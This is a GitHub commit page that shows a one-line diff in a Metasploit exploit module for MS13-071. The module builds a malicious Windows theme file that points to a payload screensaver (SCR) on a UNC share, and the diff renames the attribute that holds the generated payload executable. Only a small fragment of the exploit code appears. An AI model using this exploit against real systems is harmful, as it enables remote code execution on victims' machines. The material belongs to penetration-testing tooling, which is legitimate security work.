Skip to content

Commit 4757698

Browse files
author
Matthew Hall
committed
Modify primer to utilise file_contents macro.
1 parent e6ecdde commit 4757698

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/windows/fileformat/ms13_071_theme.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -67,7 +67,7 @@ def initialize(info={})
6767

6868
def exploit
6969
print_status("Creating '#{datastore['FILENAME']}' file ...")
70-
self.exe_contents = generate_payload_exe
70+
self.file_contents = generate_payload_exe
7171
print_status("Malicious SCR available on #{unc}...")
7272
# Default Windows XP / 2003 theme modified
7373
theme = <<-EOF

0 commit comments

Comments
 (0)